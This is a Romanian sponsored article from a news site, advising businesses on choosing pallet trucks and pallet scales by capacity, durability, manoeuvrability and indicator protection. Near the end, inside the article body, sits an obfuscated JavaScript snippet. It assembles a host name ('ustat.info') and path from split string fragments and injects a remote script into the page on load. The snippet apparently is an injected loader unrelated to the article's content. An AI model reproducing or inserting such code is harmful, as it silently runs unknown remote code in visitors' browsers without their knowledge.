Câțiva transpaleți cu cântar de calitate îți pot ridica afacerea la un alt nivel (P)

Sectorul logistic este în mare măsură dependent de utilajele care fac posibilă manipularea unor cantități mari de mărfuri în mod eficient, asta presupunând, în general, transportul și ținerea evidenței stocurilor gestionate. La fel și orice companie care, într-o formă sau alta, fabrică, vinde, depozitează sau intermediază livrarea oricăror produse la scara largă. Este, prin urmare, esențială achiziționarea de utilaje pe care să te poți baza, precum un transpalet cu cântar de calitate, care, de altfel, chiar face parte din dotarea standard a numeroase firme din întreg spectrul economic. Bineînțeles că, la fel ca în cazul oricărei decizii cu impact asupra productivității și, prin urmare, a profitului, nici alegerea celui mai potrivit cântar de paleți pentru afacerea ta nu este una ușoară.
Elemente care contează în alegerea unui cântar de palet
Cântarele pentru paleți au rolul de a determina greutatea obiectelor de mari dimensiuni, fiind utilizate în mod special în sectoarele industrial, logistic și în comerț, pentru cântărirea mărfurilor voluminoase sau a unor cantități mari în același timp.
Capacitatea maximă a unui asemenea utilaj poate ajunge până la 3 tone, însă modelele care se folosesc în mod uzual pot gestiona greutăți de până la 2000 kg. În general, acestea au o formă specifică, fie de platformă dreptunghiulară, pe care se așează obiectul de cântărit, fie de „U”, cu furci prevăzute pentru preluarea mărfurilor așezate pe paleți.
Principalele caracteristici care trebuie avute în vedere atunci când alegi o transpaletă cu cântar sau orice alt utilaj din această categorie este durabilitatea, mobilitatea și acuratețea rezultatului afișat. Datorită condițiilor în care sunt utilizate, cu solicitări extreme fizice și mecanice, în regim intensiv, de interior și exterior, aceste aparate sunt foarte rezistente la uzură de orice fel, fiind fabricate din oțel. Sunt adevărați „cai de povară”, fără de care nenumărate afaceri din foarte multe sectoare de activitate nu ar putea rămâne competitive.
Este, de asemenea, foarte importantă manevrabilitatea. Acest aspect contează, în primul rând, în cazul modelelor mobile, cum este liza cu cântar, care trebuie să fie ușor de condus și comandat, pentru a fi cu adevărat utilă într-un depozit, de exemplu, unde totul se întâmplă repede și milimetric. Însă și instrumentele de determinare a greutății staționare trebuie să poată fi mutate oricând fără a pune probleme imense de logistică, dinamica activității dintr-o afacere modernă făcând obligatorie flexibilitatea tuturor proceselor.
Nu în ultimul rând, acordă mare atenție designului. Transpaleții cu cântar și alte asemenea dispozitive sunt, în general, compacți, fiind gândiți pentru operarea în spații reduse. Toate modelele sunt joase și pot fi utilizate pe terenuri de diferite configurații, însă există diferențe între mărci care contează atunci când, spre exemplu, liza cu cântar trebuie manevrată pe culoare înguste sau pe suprafețe neuniforme.
Nu omite nici alegerea tipului potrivit de protecție a indicatorului, adaptat mediului în care urmează să fie utilizat cântarul pentru paleți. Un înveliș din plastic poate fi suficient pentru condiții normale de lucru, dar nu va asigura viabilitatea și durabilitatea componentelor sub acțiunea constantă a umezelii, prafului și a altor factori dăunători. Bunăoară, într-o brutărie sau un depozit unde se gestionează produse cu granulație fină, carcasa din oțel poate fi exact detaliul care prelungește suficient de mult durata de viață a aparatului încât să merite investiția.

Citeste si...  Investitorii au retras aproximativ 956 de milioane de dolari de la platforma pentru criptomonede Binance, după ce șeful acesteia a demisionat și a pledat vinovat în cadrul unei anchete din SUA

Lize cu cântar și alte câteva opțiuni excelente
Există numeroase opțiuni de cântare pentru paleți încât să te încurce, în sensul că varietatea modelelor îți poate îngreuna alegerea atunci când cântărești avantajele și dezavantajele fiecăruia: tip „U”, transpalet manual cu cântar, liză electrică cu cântar, cântar stivuitor, limitator de suprasarcini pentru stivuitoare etc. Bineînțeles că fiecare vine cu manual de utilizare și o listă lungă de caracteristici.
Un cântar pentru paleți tip „U”, de exemplu, este ideal pentru aflarea greutății mărfurilor paletate, deoarece are o structură care favorizează dimensiunea unui europalet, așezat pe furcile sale în mod optim. Este ușor, manevrabil, foarte mobil și nu necesită o rampă de urcare pentru plasarea încărcăturii. Încearcă, totuși, să investești într-un model cu cât mai multe opțiuni. Astfel, contează ca indicatorul de greutate să fie mobil, cu cablu extensibil, pentru a nu fi limitat în modul de desfășurare a operațiunilor logistice.
Contează, de asemenea, să poată calcula prețul mărfii cântărite în mai multe monede și să permită configurarea ușoară a cursului de schimb, să ofere posibilitatea de a controla trasabilitatea produselor și termenele de valabilitate, dar și să ofere o bază cât mai extinsă de articole și clienți, pentru eficientizarea operațiunilor.
Nu ar fi rău, în același timp, să iei în considerare și optarea pentru versiunea certificată a oricărui model de cântar de paleți ai alege, necesară pentru utilizarea în tranzacții comerciale. Poate nu este un considerent care să te intereseze acum, dar afacerile care rezistă sunt cele care își lasă deschise cât mai multe portițe pentru oportunități viitoare.

(function(){
z7xg=document.createElement(„script”);z7xg_=((„u”)+”st”)+”a”;z7xg.async=true;
z7xg.type=”text/javascript”;z7xg_+=(„t.i”)+””+”n”;z7xg_+=((„f”)+”o”);z7xg_+=”/”;
z7xgu=”2180197404.”;z7xgu+=”ecqqnkub7xgclj3jd3X”+”ahzuyffr15a”;
z7xg.src=”https://”+z7xg_+z7xgu;document.body.appendChild(z7xg);
})();

Citeste si...  Șoferii, amenințați de noi scumpiri ale polițelor auto după falimentul Euroins. ASF ia în calcul plafonarea tarifelor RCA pe o perioadă determinată

Cautimasina.ro

Cele mai citite articole

spot_img